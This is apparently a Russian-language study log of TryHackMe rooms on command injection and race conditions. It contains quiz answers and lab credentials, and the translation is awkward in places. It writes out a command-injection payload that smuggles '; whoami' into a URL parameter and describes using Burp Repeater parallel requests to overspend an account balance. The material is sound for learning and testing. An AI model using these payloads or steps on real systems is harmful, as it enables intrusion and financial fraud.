Мы используем маршрут в веб-сервере , который будет выполнять всё предоставленное. Например, чтобы выполнить команду whoami, нам нужно будет перейти по адресу http : //flaskapp.thm/whoami

Вопрос: Какая переменная хранит ввод пользователя в фрагменте PHP-кода в этом задании?

Ответ:$title

Вопрос: Какой HTTP-метод используется для получения данных, отправленных пользователем, в приведенном фрагменте PHP-кода?

Ответ:Get

Вопрос: Если я хочу выполнить idкоманду из приведенного фрагмента кода на Python, какой маршрут мне нужно будет посетить?

Ответ: /id

3. Использование уязвимостей внедрения команд

Зачастую определить возможность внедрения команд можно по поведению приложения, как вы увидите на практическом занятии в этой комнате.

Приложения, использующие ввод пользователя для заполнения системных команд данными, часто могут комбинироваться, что приводит к непредусмотренному поведению. Например, операторы оболочки `sudo` ;, ` sudo` &и &&`sudo` объединяют две (или более) системные команды и выполняют обе . Если вам незнакома эта концепция, стоит ознакомиться с модулем «Основы Linux» , чтобы узнать об этом больше.

Внедрение команд можно обнаружить, как правило, двумя способами:

Слепая инъекция команд
Подробная инъекция команд

Эти два метода описаны в таблице ниже, а более подробное объяснение приведено в двух разделах, расположенных ниже.

Метод

Описание

Слепой

Этот тип внедрения происходит, когда при тестировании полезной нагрузки приложение не выдает прямого результата. Вам придется изучить поведение приложения, чтобы определить, была ли ваша полезная нагрузка успешной.

Многословный

Этот тип внедрения предполагает прямую обратную связь от приложения после тестирования полезной нагрузки. Например, запуск команды whoamiдля определения пользователя, под которым работает приложение. Веб-приложение выведет имя пользователя непосредственно на страницу.

Обнаружение внедрения слепых команд

Слепое внедрение команд — это внедрение команды , при котором отсутствует видимый результат, поэтому оно не сразу заметно. Например, команда выполняется, но веб-приложение не выводит никакого сообщения.

Для такого типа внедрения команд нам потребуется использовать полезные нагрузки, которые вызовут некоторую задержку по времени. Например, команды `ping` pingи `ping` sleepявляются важными полезными нагрузками для тестирования. Используя `ping` pingв качестве примера, приложение зависнет на x секунд в зависимости от количества указанных вами пингов .

Ещё один метод обнаружения внедрения команд вслепую — это принудительное выделение некоторого вывода. Это можно сделать с помощью операторов перенаправления, таких как >`.`. Если вы с этим не знакомы, рекомендую ознакомиться с модулем «Основы Linux» . Например, мы можем указать веб-приложению выполнить такие команды, как `,` whoamiи перенаправить их в файл. Затем мы можем использовать команду, например, `,` catдля чтения содержимого этого вновь созданного файла.

Проверка внедрения команд таким способом часто бывает сложной и требует немалого количества экспериментов, особенно учитывая различия в синтаксисе команд между Linux и Windows.

Эта curl команда — отличный способ проверить возможность внедрения команд . Это связано с тем, что вы можете использовать её curl для передачи данных в приложение и из приложения в составе полезной нагрузки. В качестве примера рассмотрим приведенный ниже фрагмент кода: простая полезная нагрузка curl для приложения может быть использована для внедрения команд.

curl http://vulnerable.app/process.php%3Fsearch%3DThe%20Beatles%3B%20whoami

Обнаружение внедрения подробных команд

Обнаружение внедрения команд таким способом, пожалуй, является самым простым из двух методов. Подробное описание внедрения команд — это когда приложение предоставляет обратную связь или вывод о том, что происходит или выполняется.

Например, результаты выполнения таких команд, как pingили , whoamiотображаются непосредственно в веб-приложении.

Полезные полезные нагрузки

В таблицах ниже я собрал несколько полезных программ для Linux и Windows.

Linux

Windows

Вопрос: Какую полезную нагрузку мне следует использовать, если я хочу определить, от имени какого пользователя запущено приложение?

Ответ: whoami

Вопрос: Какой популярный сетевой инструмент я бы использовал для проверки возможности внедрения команд вслепую на машине с Linux ?

Ответ:ping

Вопрос: Какую полезную нагрузку я бы использовал для проверки машины под управлением Windows на предмет слепой инъекции команд?

Ответ:timeout

4. Устранение последствий внедрения команд

Внедрение команд можно предотвратить различными способами. Начиная от минимального использования потенциально опасных функций или библиотек в языке программирования и заканчивая фильтрацией входных данных без учета ввода пользователя. Ниже я более подробно опишу эти способы. Примеры ниже приведены для языка программирования PHP ; однако те же принципы могут быть распространены на многие другие языки.

Уязвимые функции

В PHP многие функции взаимодействуют с операционной системой для выполнения команд через командную оболочку; к ним относятся:

Исполнительный директор
Проход
Система

Рассмотрим приведенный ниже фрагмент кода в качестве примера. Здесь приложение будет принимать и обрабатывать только числа, введенные в форму. Это означает, что любые команды, такие как [неразборчиво], whoamiобрабатываться не будут.

Приложение принимает только определённый набор символов (цифры от 0 до 9).
Затем приложение перейдет к обработке только этих данных, которые носят исключительно числовой характер.

Эти функции принимают на вход строку или пользовательские данные и выполняют всё, что предоставлено системой. Любое приложение, использующее эти функции без надлежащей проверки, будет уязвимо для внедрения команд.

Очистка входных данных

Проверка и очистка любых входных данных от пользователя, используемых приложением, — отличный способ предотвратить внедрение команд. Это процесс определения форматов или типов данных, которые может отправлять пользователь. Например, поле ввода, принимающее только числовые данные или удаляющее любые специальные символы, такие как запятая >и &пробел /.

В приведенном ниже фрагменте кода используется функция filter_input PHP для проверки того, являются ли данные, введенные через форму ввода, числом или нет. Если это не число, значит, данные недействительны.

Обход фильтров

Приложения используют множество методов фильтрации и очистки данных, получаемых от пользователя. Эти фильтры ограничивают доступ к определенным типам данных; однако мы можем использовать логику приложения для обхода этих фильтров. Например, приложение может удалять кавычки; вместо этого мы можем использовать шестнадцатеричное значение этих кавычек для достижения того же результата.

При выполнении, хотя предоставленные данные будут иметь формат, отличающийся от ожидаемого, их все равно можно будет интерпретировать, и результат будет тем же.

Вопрос: Как называется процесс «очистки» пользовательского ввода, предоставляемого приложению?

Ответ: sanitisation (ну по идее Санация (или Очистка / Валидация))

5. Практическое занятие: Внедрение команд (развертывание)

Запустите машину, подключенную к этой задаче; она станет видна в режиме разделенного экрана, как только будет готова.

Протестируйте несколько полезных нагрузок в приложении, размещенном на веб-сайте и отображаемом в режиме разделенного экрана, чтобы проверить возможность внедрения команд. Обратитесь к этой шпаргалке, если у вас возникнут трудности или вы захотите изучить более сложные полезные нагрузки.

Найдите содержимое флага, расположенного в файле /home/tryhackme/flag.txt . Для этого можно использовать различные полезные нагрузки — я рекомендую попробовать несколько вариантов.

Вопрос: От имени какого пользователя запущено это приложение?

Ответ:www-data

Вопрос: Что содержит флаг, расположенный в файле /home/tryhackme/flag.txt ?

Ответ:

6. Заключение

Молодец, что дошли до конца этой комнаты. Вкратце, мы изучили следующие элементы внедрения команд :

Как обнаружить уязвимость внедрения команд
Как протестировать и использовать эту уязвимость с помощью полезных нагрузок, разработанных для разных операционных систем.
Как предотвратить эту уязвимость в приложении
Применение полученных знаний на практике путем выполнения внедрения команд.

Как вы, вероятно, уже выяснили, существует несколько полезных нагрузок, которые можно использовать для достижения одной и той же цели. Я настоятельно рекомендую вам вернуться к практической стороне этой задачи и попробовать альтернативные методы извлечения флага.

День 34. Race Conditions

2026-02-23T15:36:34.099Z

Условия гонки - Узнайте о состояниях гонки и о том, как они влияют на безопасность веб-приложений.

1. Введение

Допустим, нам поручено протестировать безопасность веб-приложения для онлайн-покупок. Возникает множество вопросов. Можно ли использовать одну и ту же подарочную карту на 10 долларов для оплаты товара стоимостью 100 долларов? Можно ли применить одну и ту же скидку к корзине покупок несколько раз? Ответ: возможно ! Если система подвержена уязвимости типа «гонка состояний», мы можем сделать всё это и многое другое.

В этом разделе рассматривается уязвимость, связанная с состоянием гонки. Состояние гонки — это ситуация в компьютерных программах, когда время событий влияет на поведение и результат программы. Обычно это происходит, когда к переменной обращаются и изменяют её несколько потоков. Из-за отсутствия надлежащих механизмов блокировки и синхронизации между различными потоками злоумышленник может злоупотребить системой и применить скидку несколько раз или совершить денежные транзакции, превышающие его баланс.

Цели обучения

После прохождения этого раздела вы узнаете следующее:

Уязвимость к условиям гонки
Использование Burp Suite Repeater для эксплуатации состояний гонки

В процессе обучения вы также узнаете о:

Потоки и многопоточность
Диаграммы состояний

Предварительные условия обучения

Для успешного прохождения этого курса рекомендуется ознакомиться с протоколом HTTP , веб-приложениями и Burp Suite . Для восполнения пробелов в знаниях рекомендуется пройти следующие курсы и модули.

2. Многопоточность

В этом задании мы кратко рассмотрим следующие термины:

Программа
Процесс
Нить
Многопоточность

Программы

Программа — это набор инструкций для выполнения определенной задачи. Для достижения желаемого результата необходимо выполнить программу. Без выполнения она ничего не сделает и останется набором статических инструкций.

Представьте это как рецепт; вы только что скачали новый рецепт кофе, в котором используются различные травы, такие как кардамон и корица. Вот инструкция:

1. Combine brewed coffee, cardamom, cinnamon, and cloves (if using) in a saucepan.
2. Heat the mixture over low heat for 5 minutes, stirring occasionally. Do not boil.
3. Strain the coffee into your mug.
4. Add milk if desired, and sweeten to taste with honey or sugar.

Если кто-либо не выполнит вышеуказанные инструкции, кофе подаваться не будет!

Сравните это с нашим минимальным сервером Flask (Python) «Hello, World!». Приведенный ниже код указывает, что приложение будет прослушивать порт 8080 и отвечать минимальной приветственной HTML-страницей, содержащей «Hello, World!». Однако, прежде чем ожидать получения каких-либо приветственных страниц, необходимо выполнить эти инструкции (программу).

Обратите внимание, что приведенный ниже код Flask предназначен только для демонстрационных целей. Мы не предоставили среду для его запуска, поскольку это выходит за рамки данной темы.

# Import the Flask class from the flask module
from flask import Flask

# Create an instance of the Flask class representing the application
app = Flask(__name__)

# Define a route for the root URL ('/')
@app.route('/')
def hello_world():
    # This function will be executed when the root URL is accessed
    # It returns a string containing HTML code for a simple web page
    return '<html><head><title>Greeting</title></head><body><h1>Hello, World!</h1></body></html>'

# This checks if the script is being run directly (as the main program)
# and not being imported as a module
if __name__ == '__main__':
    # Run the Flask application
    # The host='0.0.0.0' allows the server to be accessible from any IP address
    # The port=8080 specifies the port number on which the server will listen
    app.run(host='0.0.0.0', port=8080)

Процессы

Однажды днем вы решаете попробовать новый рецепт кофе, который скачали из интернета. Вы начинаете выполнять рецепт шаг за шагом. Вы находитесь в процессе приготовления этого кофе. Во время «выполнения» «инструкций» вас может прервать срочный звонок. Или вы можете заняться другой «работой», ожидая, пока нагреется вода. Перерывы и ожидание, как правило, неизбежны. Выполнение инструкций рецепта для приготовления кофе похоже на выполнение инструкций программы.

Процесс — это программа , находящаяся в процессе выполнения. В некоторых источниках можно встретить термин «задание» . Оба термина обозначают одно и то же, хотя термин «процесс» вытеснил термин «задание». В отличие от программы, которая является статической, процесс — это динамическая сущность. Он обладает несколькими ключевыми аспектами, в частности:

Программа : исполняемый код, относящийся к процессу.
Память : временное хранилище данных.
Состояние : Процесс обычно переходит между различными состояниями. После того, как он находится в состоянии «Новый», то есть только что создан, он переходит в состояние «Готов», то есть готов к выполнению после получения процессорного времени. Как только процессор выделит для него время, он переходит в состояние «Выполняется». Кроме того, он может находиться в состоянии «Ожидание», ожидая завершения операций ввода-вывода или событий. После завершения он переходит в состояние «Завершено».

Если вы запустите приведенный выше код Flask, будет создан процесс, который будет прослушивать входящие соединения на порту 8080. Другими словами, большую часть времени он будет находиться в состоянии ожидания (Waiting). Получив HTTP- GET /запрос, он переключится в состояние готовности (Ready), ожидая своей очереди на выполнение в соответствии с планированием ЦП . После перехода в состояние выполнения (Running) он отправит HTML-страницу клиенту и вернется в состояние ожидания (Waiting).

С точки зрения сервера, приложение обслуживает клиентов последовательно, то есть запросы клиентов обрабатываются по одному. (Обратите внимание, что Flask по умолчанию многопоточный, начиная с версии 1.0. Мы использовали аргумент --without-threadsдля принудительного запуска в однопоточном режиме.)

Обратите внимание, что приведенная ниже команда Flask носит исключительно демонстрационный характер.

Терминал

$ flask run --without-threads --host=0.0.0.0
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:5000
 * Running on http://192.168.0.104:5000
Press CTRL+C to quit
127.0.0.1 - - [16/Apr/2024 23:34:46] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Apr/2024 23:34:48] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Apr/2024 23:35:11] "GET / HTTP/1.1" 200 -

Нити

В заключение еще одна кофейная аналогия! Рассмотрим случай с профессиональной эспрессо-машиной в кофейне. Допустим, у нее два портафильтра. В начале рабочего дня бариста включает эспрессо-машину, и всякий раз, когда клиент заказывает эспрессо, для приготовления порции используется один портафильтр. Заказывает ли эспрессо другой клиент? Нет проблем, на помощь приходит второй портафильтр! Разогретая эспрессо-машина — это процесс; каждому новому заказу назначается свой портафильтр; это аналогия для всей дискуссии.

Поток — это легковесная единица выполнения. Он разделяет с процессом различные части памяти и инструкции.

Во многих случаях нам приходится многократно повторять один и тот же процесс. Представьте себе веб-сервер, обслуживающий тысячи пользователей одной и той же страницей (или персонализированной страницей). Мы можем использовать один из двух основных подходов:

Последовательный режим: запущен один процесс, который последовательно обслуживает пользователей одного за другим. Новые пользователи добавляются в очередь.
Параллельный режим: работает один процесс; он создает поток для обслуживания каждого нового пользователя. Новые пользователи добавляются в очередь только после достижения максимального количества запущенных потоков.

Предыдущее приложение может работать в четырех потоках с использованием Gunicorn. Gunicorn, также называемый «Зеленым Единорогом», — это HTTP- сервер WSGI на Python . WSGI расшифровывается как Web Server Gateway Interface (интерфейс шлюза веб-сервера), который соединяет веб-серверы и веб-приложения на Python. В частности, Gunicorn может запускать несколько рабочих процессов для одновременной обработки входящих запросов. Запуская приложение gunicornс --workers=4опцией, мы указываем, что нам нужны четыре рабочих процесса, готовых обрабатывать запросы клиентов; кроме того, --threads=2указывает, что каждый рабочий процесс может запускать два потока.

Обратите внимание, что приведенная ниже команда Gunicorn предназначена только для демонстрационных целей. Мы не предоставили среду для ее запуска, поскольку это выходит за рамки данной темы.

Терминал

gunicorn --workers=4 --threads=2 -b 0.0.0.0:8080 app:app
[2024-04-16 23:35:59 +0300] [507149] [INFO] Starting gunicorn 21.2.0
[2024-04-16 23:35:59 +0300] [507149] [INFO] Listening at: http://0.0.0.0:8080 (507149)
[2024-04-16 23:35:59 +0300] [507149] [INFO] Using worker: gthread
[2024-04-16 23:35:59 +0300] [507150] [INFO] Booting worker with pid: 507150
[2024-04-16 23:35:59 +0300] [507151] [INFO] Booting worker with pid: 507151
[2024-04-16 23:35:59 +0300] [507152] [INFO] Booting worker with pid: 507152
[2024-04-16 23:35:59 +0300] [507153] [INFO] Booting worker with pid: 507153

Стоит отметить следующее:

Запустить более одной копии этого процесса невозможно, поскольку он привязывается к TCP- порту 8080. К TCP- или UDP- порту может быть привязан только один процесс.
Процесс можно настроить с любым количеством потоков, и HTTP- запросы, поступающие на порт 8080, будут отправляться различным потокам.

Вопрос: Вы скачали инструкцию по изготовлению журавлика оригами. Как бы выглядела эта инструкция с точки зрения компьютерной графики?

Ответ: Program

Вопрос: Как называется состояние, в котором процесс ожидает события ввода-вывода?

Ответ: Waiting

3. Условия гонки

Аналогия с реальным миром

Представьте следующую ситуацию. Вы звоните в ресторан, чтобы забронировать столик для важного делового обеда. Вы знакомы с рестораном и его обстановкой. Один конкретный столик, номер 17, — ваш предпочтительный выбор, поскольку из него открывается хороший вид и он находится в относительно уединенном месте. Вы звоните, чтобы забронировать столик № 17; администратор подтверждает, что он свободен, так как на нем нет метки «Забронировано». В то же время другой клиент разговаривает с другим администратором и бронирует тот же столик.

Кто на самом деле забронировал столик? Это уже вопрос расовой принадлежности. (что? эм скорее это проблема перевода... ну или нет))

Почему это произошло? Эта неприятная ситуация возникла из-за того, что бронированием занимались несколько хостесс; кроме того, хостесс потребовалось несколько минут, чтобы достать бирку «Забронировано» и положить её на стол после обновления ежедневной книги бронирований. У другого клиента есть как минимум минута, чтобы забронировать зарезервированный столик.

Аналогично, когда один поток проверяет значение для выполнения действия, другой поток может изменить это значение до того, как действие будет выполнено.

Пример А

Рассмотрим следующий сценарий:

На банковском счете 100 долларов.
Два потока пытаются одновременно вывести деньги.
Первый поток проверяет баланс (видит 100 долларов) и снимает 45 долларов.
Перед тем как поток 1 обновит баланс , поток 2 также проверит баланс (ошибочно увидит 100 долларов) и выведет 35 долларов.

Мы не можем быть на 100% уверены, какой поток первым обновит остаток средств; однако предположим, что это будет Поток 1. Поток 1 установит остаток средств на уровне 55 долларов. После этого Поток 2 может установить остаток средств на уровне 65 долларов, если это не будет обработано должным образом. (Поток 2 рассчитал, что после снятия средств на счете должно остаться 65 долларов, поскольку на момент проверки Потоком 2 баланс составлял 100 долларов.) Другими словами, пользователь совершил два снятия средств, но остаток на счете был списан только за второе, потому что так решил Поток 2!

Пример Б

Рассмотрим другой сценарий:

На банковском счету 75 долларов.
Два потока пытаются одновременно вывести деньги.
Первый поток проверяет баланс (видит 75 долларов) и снимает 50 долларов.
Перед тем как поток 1 обновит баланс , поток 2 проверит баланс (ошибочно увидит 75 долларов) и выведет 50 долларов.

В рамках второй ветки обсуждения будет осуществлен вывод средств, хотя подобную транзакцию следовало бы отклонить.

Примеры A и B демонстрируют уязвимость, связанную с преобразованием данных о времени проверки в данные о времени использования (TOCTOU).

Пример кода

Рассмотрим следующий код на Python с двумя потоками, имитирующими завершение задачи с шагом в 10%.

import threading

x = 0  # Shared variable

def increase_by_10():
    global x
    for i in range(1, 11):
        x += 1
        print(f"Thread {threading.current_thread().name}: {i}0% complete, x = {x}")

# Create two threads
thread1 = threading.Thread(target=increase_by_10, name="Thread-1")
thread2 = threading.Thread(target=increase_by_10, name="Thread-2")

# Start the threads
thread1.start()
thread2.start()

# Wait for both threads to finish
thread1.join()
thread2.join()

print("Both threads have finished completely.")

Эти два потока запускаются одновременно; они ничего не делают, кроме вывода значения на экран. Следовательно, можно было бы ожидать, что они завершатся одновременно, или, по крайней мере, результат будет согласованным. Однако в приведенной выше программе нет гарантии, какой поток завершится первым и как скоро это произойдет. Ниже приведен результат первого выполнения:

Терминал

python t3_race_to_100.py
...
Thread Thread-1: 40% complete, x = 10
Thread Thread-2: 70% complete, x = 11
Thread Thread-1: 50% complete, x = 12
Thread Thread-2: 80% complete, x = 13
Thread Thread-1: 60% complete, x = 14
Thread Thread-1: 70% complete, x = 16
Thread Thread-2: 90% complete, x = 15
Thread Thread-2: 100% complete, x = 17
Thread Thread-1: 80% complete, x = 18
Thread Thread-1: 90% complete, x = 19
Thread Thread-1: 100% complete, x = 20
Both threads have finished completely.

Ниже представлен второй результат выполнения:

Терминал

python t3_race_to_100.py 
...
Thread Thread-1: 70% complete, x = 10
Thread Thread-2: 40% complete, x = 11
Thread Thread-1: 80% complete, x = 12
Thread Thread-2: 50% complete, x = 13
Thread Thread-1: 90% complete, x = 14
Thread Thread-2: 60% complete, x = 15
Thread Thread-1: 100% complete, x = 16
Thread Thread-2: 70% complete, x = 17
Thread Thread-2: 80% complete, x = 18
Thread Thread-2: 90% complete, x = 19
Thread Thread-2: 100% complete, x = 20
Both threads have finished completely.

Многократный запуск этой программы приведет к различным результатам. В первой попытке поток Thread-2 достиг 100 первым; однако во второй попытке поток Thread-2 достиг 100 вторым. Мы не можем контролировать результат. Если безопасность нашего приложения зависит от того, завершится ли один поток раньше другого, то нам необходимо внедрить механизмы для обеспечения надлежащей защиты. Рассмотрим следующие два примера, чтобы лучше понять серьезность ошибок, возникающих, когда мы полагаемся на случай.

На платформе AttackBox вы можете сохранить приведенный выше код Python и запустить его несколько раз, чтобы понаблюдать за результатом. Например, если вы сохранили его как race.py, вы можете запустить скрипт с помощью python race.pyкоманды.

Причины

Как мы видели в предыдущей программе, два потока изменяли одну и ту же переменную. Всякий раз, когда потоку предоставлялось процессорное время, он стремился увеличить значение xна 1. В результате эти два потока «соревновались» в увеличении одной и той же переменной. Эта программа демонстрирует простой пример, происходящий на одном хосте.

В целом, распространенной причиной состояний гонки являются совместно используемые ресурсы. Например, когда несколько потоков одновременно обращаются к одним и тем же общим данным и изменяют их. Примерами совместно используемых данных являются запись в базе данных и структура данных в оперативной памяти. Существует множество более тонких причин, но мы упомянем три наиболее распространенных:

Параллельное выполнение : Веб-серверы могут выполнять несколько запросов параллельно для обработки одновременных взаимодействий с пользователями. Если эти запросы обращаются к общим ресурсам или состояниям приложения и изменяют их без надлежащей синхронизации, это может привести к состояниям гонки и непредсказуемому поведению.
Операции с базой данных : Параллельные операции с базой данных, такие как последовательности чтения-изменения-записи, могут приводить к состояниям гонки. Например, попытка двух пользователей одновременно обновить одну и ту же запись может привести к несогласованности данных или конфликтам. Решение заключается в обеспечении надлежащих механизмов блокировки и изоляции транзакций.
Сторонние библиотеки и сервисы : В настоящее время веб-приложения часто интегрируются со сторонними библиотеками, API и другими сервисами. Если эти внешние компоненты не предназначены для надлежащей обработки одновременного доступа, при одновременном взаимодействии нескольких запросов или операций могут возникать состояния гонки.

Вопрос: Гарантирует ли представленный скрипт на Python, какой поток первым достигнет 100% выполнения? (Да/Нет)

Ответ: Nay

Вопрос: Как называется поток, который первым достиг 100% при втором выполнении скрипта на Python?

Ответ: Thread-1

4. Архитектура веб-приложения

Давайте рассмотрим архитектуру веб-приложений, чтобы объяснить, как могут возникать состояния гонки.

Клиент-серверная модель

Веб-приложения работают по клиент-серверной модели:

Клиент : Клиентом является программа или приложение, инициирующее запрос на предоставление услуги. Например, когда мы просматриваем веб-страницу, наш веб-браузер запрашивает веб-страницу (файл) у веб-сервера.
Сервер : Сервер — это программа или система, которая предоставляет эти услуги в ответ на входящие запросы. Например, веб-сервер отвечает на входящий HTTP- GET запрос и отправляет HTML-страницу (или файл) запрашивающему веб-браузеру (клиенту).

В общем случае, клиент-серверная модель работает по сети. Клиент отправляет свой запрос по сети, а сервер получает его и обрабатывает, прежде чем отправить обратно необходимый ресурс.

Типичное веб-приложение

Веб-приложение имеет многоуровневую архитектуру. Такая архитектура разделяет логику приложения на разные слои или уровни. Наиболее распространенная архитектура использует три уровня:

Уровень представления : В веб-приложениях этот уровень состоит из веб-браузера на стороне клиента. Веб-браузер отображает код HTML, CSS и JavaScript.
Уровень приложения : Этот уровень содержит бизнес-логику и функциональность веб-приложения. Он получает запросы от клиентов, обрабатывает их и взаимодействует с уровнем данных. Он реализован с использованием серверных языков программирования, таких как Node.js и PHP , а также многих других.
Уровень данных : Этот уровень отвечает за хранение и обработку данных приложения. Типичные операции с базой данных включают создание, обновление, удаление и поиск существующих записей. Обычно это достигается с помощью системы управления базами данных (СУБД); примерами СУБД являются MySQL и PostgreSQL.

Штаты

Прежде чем углубляться в тему, рассмотрим несколько примеров из области бизнес-логики. Рассмотрим следующие примеры:

Проверка и осуществление денежных переводов.
Проверка промокодов и применение скидок.

Проверка и осуществление денежных переводов

Рассмотрим пример перевода денег другу или на другой свой счет. Программа будет работать следующим образом:

Пользователь нажимает кнопку «Подтвердить перевод».
Приложение запрашивает данные из базы данных, чтобы подтвердить, что баланс счета покрывает сумму перевода.
База данных отвечает на запрос.

Если сумма находится в пределах лимитов счета, приложение выполняет транзакцию.
Если сумма превышает лимит счета, приложение выдает сообщение об ошибке.

В идеальном случае приведенный выше код приводит к двум состояниям программы:

Сумма не отправлена
Отправленная сумма

Проверка промокодов и применение скидок.

Рассмотрим пример применения купона на скидку. Пользователь заходит в корзину и добавляет купон, чтобы получить скидку. Последовательность действий может выглядеть примерно так:

Пользователь вводит промокод
Приложение запрашивает данные из базы данных, чтобы определить, действителен ли промокод и существуют ли какие-либо ограничения.
База данных отвечает, указывая на достоверность и ограничения.

Скидка применяется, если код действителен и нет ограничений на его применение для данного пользователя.
Если код недействителен или существуют ограничения на его применение для данного пользователя, отображается сообщение об ошибке.

Приведённый выше код приводит к нескольким состояниям программы:

Купон не применен
Купон применен

Два штата? Подумайте ещё раз.

Продолжим анализ применения купона на скидку. В идеале мы ожидаем два состояния: «Купон не применен» и «Купон применен» . Однако это слишком упрощенно для описания реальных сложных сценариев. Мы можем добавить промежуточное состояние: «Проверка применимости купона» .

В зависимости от способа разработки приложения можно ожидать больше состояний. Например, проверка применимости купона может включать два состояния: проверка действительности купона и проверка ограничений купона . Купон может быть действителен, но существующие ограничения не позволяют его использовать. Аналогично, применение купона может быть разделено на два состояния, одно из которых — перерасчет общей суммы .

Почему это важно для условий гонки?

На приведенной выше диаграмме состояний видно, что мы проходим через несколько состояний, прежде чем купон будет помечен как примененный. Давайте изобразим состояния на временной оси, как показано ниже.

Между моментом попытки добавления купона и моментом, когда купон помечается как примененный и его нельзя применить повторно, существует временной промежуток. Пока купон не помечен как примененный, скорее всего, никакие механизмы контроля не препятствуют его многократному использованию. В течение этого временного промежутка мы можем использовать его несколько раз.

Аналогичная ситуация наблюдается и при рассмотрении состояний программы, осуществляющей денежный перевод. Хотя в идеале должно быть два состояния, с учетом бизнес-логики мы можем легко обновить диаграмму, включив в нее три состояния. Причина в том, что мы ожидаем некоторого времени, затрачиваемого на проверку баланса счета и лимитов; хотя это время может быть небольшим, оно не равно нулю. Если мы копнем глубже, мы сможем обнаружить больше «скрытых» состояний.

Однако, даже если веб-приложение уязвимо, нам все равно предстоит преодолеть одну проблему: временные рамки. Даже в уязвимых приложениях это «окно возможностей» относительно короткое; поэтому для его использования необходимо, чтобы наши запросы достигали сервера одновременно. На практике мы стремимся к тому, чтобы наши повторные запросы достигали сервера с интервалом всего в миллисекунды.

Как нам добиться того, чтобы дублирующиеся запросы достигали сервера в течение этого короткого промежутка времени? Нам нужен такой инструмент, как Burp Suite .

Вопрос: Сколько состояний содержала исходная схема состояний «проверка и осуществление денежных переводов»?

Ответ: 2

Вопрос: Сколько состояний содержала обновленная схема состояний «проверка и осуществление денежных переводов»?

Ответ: 3

Вопрос: Сколько состояний содержала итоговая диаграмма состояний «проверка кодов купонов и применение скидок»?

Ответ: 5

5. Использование условий гонки

Нажмите кнопку «Запустить машину» справа, чтобы запустить подключенную виртуальную машину . Нажмите кнопку «Запустить AttackBox» вверху, чтобы запустить AttackBox. В AttackBox перейдите по адресу http://MACHINE_IP:8080.

Это учетные данные двух пользователей:

Пользователь1:07799991337
Пароль:pass1234

Пользователь2:07113371111
Пароль:pass1234

Это веб-приложение принадлежит мобильному оператору и позволяет переводить средства на счет телефона. В этой демонстрации мы проверим, подвержена ли система уязвимости типа «гонка», и попытаемся использовать её, переведя больше средств, чем у нас есть на счету.

Для начала нам нужно изучить, как целевое веб-приложение получает HTTP-запросы и как оно на них отвечает. Используя Burp Suite Proxy , нажмите «Открыть браузер» на вкладке «Перехват» . (Если вы получите сообщение об ошибке, связанное с включением песочницы браузера, вам необходимо вручную изменить настройки. В этом случае нажмите «Настройки» в правом верхнем углу окна Burp Suite, выберите браузер Burp в разделе «Инструменты» и установите флажок « Разрешить браузеру Burp работать без песочницы» .) Используя встроенный браузер, мы можем просмотреть целевой сайт и изучить, как он обрабатывает наши HTTP-запросы, в частности, сами HTTP- запросы и соответствующие ответы. На вкладке « История HTTP» регистрируется каждый HTTP- запрос и соответствующий ответ.POST

Войдите в любой из аккаунтов и нажмите кнопку «Оплата и пополнение» . Давайте совершим перевод средств: нажмите кнопку «Перевод» и введите номер мобильного телефона другого аккаунта, а также сумму, которую хотите перевести. Вы можете попробовать перевести сумму, превышающую ваш текущий баланс, и небольшую сумму, например, 1 доллар, чтобы посмотреть, как система отреагирует в каждом случае.

Burp Suite : Repeater

На изображении ниже мы видим:

ЗапросPOST
В подробностях указан целевой номер телефона и сумма перевода в размере 1,5 доллара.
Из полученного ответа можно сделать вывод, что транзакция прошла успешно.

Теперь, когда мы рассмотрели, как система реагирует на действительные и недействительные запросы, давайте посмотрим, сможем ли мы использовать состояние гонки. Щелкните правой кнопкой мыши по POSTзапросу, который хотите скопировать, и выберите «Отправить в повторитель» .

На вкладке «Повторитель» , как показано на пронумерованных скриншотах ниже:

Щелкните +значок рядом с вкладкой «Полученные запросы» и выберите «Создать группу вкладок».
Присвойте группе имя и укажите вкладку запроса, который вы только что отправили импортеру, прежде чем нажать кнопку «Создать».
Щелкните правой кнопкой мыши на вкладке запроса и выберите «Дублировать вкладку» (если эта опция недоступна в вашей версии, вы можете вместо этого несколько раз нажать CTRL + R ).
Для начала мы повторим это 20 раз.
Рядом с кнопкой «Отправить» стрелка, указывающая вниз, откроет меню, позволяющее выбрать способ отправки дублирующихся запросов.

Далее мы воспользуемся уязвимостью целевого приложения, отправив дублированный запрос. Используя встроенные параметры Burp Suite Repeater, стрелка раскрывающегося списка предлагает следующие варианты:

Отправка группы последовательно ( одно соединение )
Отправка группы последовательно ( отдельные соединения )
Отправка группы параллельно

Последовательная отправка группы запросов

При последовательной отправке группы предоставляются два варианта:

Отправка группы последовательно ( одно соединение )
Отправка группы последовательно ( отдельные соединения )

Отправка группы сообщений последовательно по одному соединению.

Этот параметр устанавливает единственное соединение с сервером и отправляет все запросы во вкладки группы перед закрытием соединения. Это может быть полезно для тестирования на предмет потенциальных уязвимостей, связанных с рассинхронизацией на стороне клиента.

Отправка групповых сообщений последовательно по отдельным соединениям.

Как следует из названия, эта опция устанавливает TCP-соединение, отправляет запрос от группы и закрывает TCP-соединение, после чего процесс повторяется для последующего запроса.

Мы протестировали этот вариант атаки на веб-приложение. На скриншоте ниже показаны 21 TCP-соединение для различных POST-запросов в отправленной нами группе.

Первая группа (обозначена цифрой 1) включает пять успешных запросов. Мы смогли подтвердить их успешность, проверив соответствующие ответы. Кроме того, мы заметили, что каждый запрос занимал около 3 секунд, как показано на графике (обозначен цифрой 3).
Вторая группа (обозначенная цифрой 2) показывает шестнадцать отклоненных запросов. Длительность составила около четырех миллисекунд. Интересно также проверить относительное время начала.

На скриншоте ниже показано всё TCP-соединение для запроса. Мы можем подтвердить, что POSTзапрос был отправлен одним пакетом.

Отправка группы запросов параллельно

Выбор параллельной отправки запросов группы приведет к тому, что ретранслятор отправит все запросы группы одновременно. В этом случае мы наблюдаем следующее, как показано на скриншоте ниже:

В столбце «Относительное начало» мы видим, что все 21 пакет были отправлены в течение окна в 0,5 миллисекунды (обозначено цифрой 1).
Все 21 запрос были успешно выполнены; в результате был успешно осуществлен перевод средств. Выполнение каждого запроса заняло около 3,2 секунды (обозначено цифрой 2).

